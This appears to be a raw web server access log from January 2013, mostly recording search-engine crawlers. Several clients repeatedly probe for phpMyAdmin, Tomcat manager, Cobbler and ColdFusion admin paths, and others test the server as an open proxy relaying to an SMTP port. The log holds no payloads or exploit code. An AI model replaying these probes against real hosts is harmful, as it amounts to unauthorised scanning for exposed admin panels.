71.126.114.58 - - [07/Jan/2013:09:15:17 +0100] "HEAD /phpmyadmin/print.css HTTP/1.1" 404 - "http://212.91.246.88/phpmyadmin/print.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
66.249.75.171 - - [07/Jan/2013:09:17:47 +0100] "GET /robots.txt HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.171 - - [07/Jan/2013:09:17:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.20.69.98 - - [07/Jan/2013:09:24:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.69.98 - - [07/Jan/2013:09:24:32 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
71.126.114.58 - - [07/Jan/2013:10:32:16 +0100] "HEAD /phpmyadmin/print.css HTTP/1.1" 404 - "http://212.91.246.84/phpmyadmin/print.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
85.17.29.107 - - [07/Jan/2013:11:26:29 +0100] "GET /robots.txt HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
85.17.29.107 - - [07/Jan/2013:11:26:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
203.123.188.104 - - [07/Jan/2013:11:46:13 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
209.190.1.132 - - [07/Jan/2013:11:51:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
66.249.78.36 - - [07/Jan/2013:12:16:05 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.36 - - [07/Jan/2013:12:16:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
176.9.155.226 - - [07/Jan/2013:13:54:31 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [07/Jan/2013:13:54:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
94.102.51.246 - - [07/Jan/2013:14:09:00 +0100] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5C%40 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
50.17.116.211 - - [07/Jan/2013:14:15:05 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
65.55.213.79 - - [07/Jan/2013:15:06:13 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.79 - - [07/Jan/2013:15:06:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
23.22.90.147 - - [07/Jan/2013:15:53:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
54.243.1.44 - - [07/Jan/2013:16:05:05 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "-"
23.20.198.29 - - [07/Jan/2013:16:24:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
107.20.117.12 - - [07/Jan/2013:16:30:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
54.235.227.15 - - [07/Jan/2013:16:52:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
209.190.1.131 - - [07/Jan/2013:17:18:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
50.16.61.193 - - [07/Jan/2013:19:01:51 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
184.72.90.231 - - [07/Jan/2013:19:05:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
184.72.198.40 - - [07/Jan/2013:19:15:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
50.17.20.28 - - [07/Jan/2013:20:28:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
54.234.34.219 - - [07/Jan/2013:20:41:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
208.113.251.36 - - [07/Jan/2013:20:58:00 +0100] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
81.30.151.218 - - [07/Jan/2013:21:42:59 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Pixray-Seeker/2.0 (Pixray-Seeker; +http://www.pixray.com/pixraybot; +crawler@pixray.com)"
81.30.151.218 - - [07/Jan/2013:21:42:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Pixray-Seeker/2.0 (Pixray-Seeker; +http://www.pixray.com/pixraybot; +crawler@pixray.com)"
66.249.75.40 - - [07/Jan/2013:22:19:04 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.40 - - [07/Jan/2013:22:19:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.126.114.58 - - [07/Jan/2013:22:29:55 +0100] "HEAD /phpmyadmin/print.css HTTP/1.1" 404 - "http://212.91.246.81/phpmyadmin/print.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
67.221.128.18 - - [07/Jan/2013:22:40:56 +0100] "POST http://lti-mail01.ltinetworks.com:25/ HTTP/1.0" 200 1229 "-" "-"
67.221.128.18 - - [07/Jan/2013:22:40:58 +0100] "CONNECT http://lti-mail01.ltinetworks.com:25 HTTP/1.0" 400 328 "-" "-"
95.87.201.110 - - [07/Jan/2013:23:52:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
109.86.105.169 - - [07/Jan/2013:23:54:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [08/Jan/2013:00:58:38 +0100] "GET / HTTP/1.1" 200 1229 "http://www.sumaja.de/?such_wert=berlin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1"
217.69.133.69 - - [08/Jan/2013:02:10:28 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
64.246.165.210 - - [08/Jan/2013:05:01:59 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.210 - - [08/Jan/2013:05:01:59 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/mink-berlin.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
85.17.29.107 - - [08/Jan/2013:05:40:35 +0100] "GET /robots.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
85.17.29.107 - - [08/Jan/2013:05:40:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
141.8.147.1 - - [08/Jan/2013:10:31:23 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
176.9.51.195 - - [08/Jan/2013:10:57:21 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.195 - - [08/Jan/2013:10:57:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.195 - - [08/Jan/2013:10:57:21 +0100] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.195 - - [08/Jan/2013:10:57:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.195 - - [08/Jan/2013:10:57:22 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.195 - - [08/Jan/2013:10:57:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.141 - - [08/Jan/2013:11:01:20 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.141 - - [08/Jan/2013:11:01:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
141.8.147.1 - - [08/Jan/2013:13:29:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.55.213.73 - - [08/Jan/2013:15:00:59 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [08/Jan/2013:15:01:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.78.193 - - [08/Jan/2013:18:05:09 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.193 - - [08/Jan/2013:18:05:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.165.193.160 - - [08/Jan/2013:18:43:30 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:30 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:35 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:36 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:36 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:37 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:38 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:38 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:38 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:18:43:38 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
178.77.126.55 - - [08/Jan/2013:18:55:20 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [08/Jan/2013:18:55:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
46.165.193.160 - - [08/Jan/2013:22:15:23 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:24 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:24 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:25 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:25 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:25 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:25 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:25 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:26 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.160 - - [08/Jan/2013:22:15:26 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
94.23.45.14 - - [08/Jan/2013:22:18:33 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
216.55.162.168 - - [09/Jan/2013:00:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1"
157.55.34.171 - - [09/Jan/2013:01:24:08 +0100] "GET /robots.txt HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.34.171 - - [09/Jan/2013:01:26:13 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.1 - - [09/Jan/2013:08:54:09 +0100] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
206.253.226.18 - - [09/Jan/2013:09:12:49 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
184.73.55.214 - - [09/Jan/2013:11:20:49 +0100] "GET / HTTP/1.0" 200 1229 "http://www.go-profitclicking.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
64.246.165.190 - - [09/Jan/2013:12:28:38 +0100] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.190 - - [09/Jan/2013:12:28:38 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/schraeg-senkrechtaufzuege.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
141.8.147.1 - - [09/Jan/2013:13:38:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.112.66 - - [09/Jan/2013:14:50:50 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.112.66 - - [09/Jan/2013:14:50:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
141.8.147.1 - - [09/Jan/2013:14:57:45 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
69.175.54.106 - - [09/Jan/2013:15:12:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
66.249.78.65 - - [09/Jan/2013:16:06:00 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.65 - - [09/Jan/2013:16:06:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
96.60.111.195 - - [09/Jan/2013:16:25:27 +0100] "GET http://www.microsoft.com/ HTTP/1.0" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
96.60.111.195 - - [09/Jan/2013:16:25:27 +0100] "POST http://lti-mail01.ltinetworks.com:25/ HTTP/1.0" 200 1229 "-" "-"
96.60.111.195 - - [09/Jan/2013:16:25:29 +0100] "CONNECT http://lti-mail01.ltinetworks.com:25 HTTP/1.0" 400 328 "-" "-"
65.55.213.73 - - [09/Jan/2013:16:37:47 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [09/Jan/2013:16:37:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
193.231.100.23 - - [09/Jan/2013:17:16:00 +0100] "POST /cobbler_api HTTP/1.1" 404 316 "-" "-"
46.165.193.147 - - [09/Jan/2013:17:29:07 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:07 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:09 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:09 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:09 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:09 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:09 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:09 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:09 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:17:29:10 +0100] "GET /pma/translators.html HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
141.8.147.1 - - [09/Jan/2013:17:29:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
193.231.100.23 - - [09/Jan/2013:18:27:55 +0100] "GET /CFIDE/adminapi/administrator.cfc?wsdl HTTP/1.0" 404 337 "-" "-"
176.9.51.137 - - [09/Jan/2013:19:02:46 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.137 - - [09/Jan/2013:19:02:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
173.59.108.98 - - [09/Jan/2013:19:36:38 +0100] "HEAD /phpmyadmin/print.css HTTP/1.1" 404 - "http://212.91.246.89/phpmyadmin/print.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
141.8.147.1 - - [09/Jan/2013:19:54:38 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
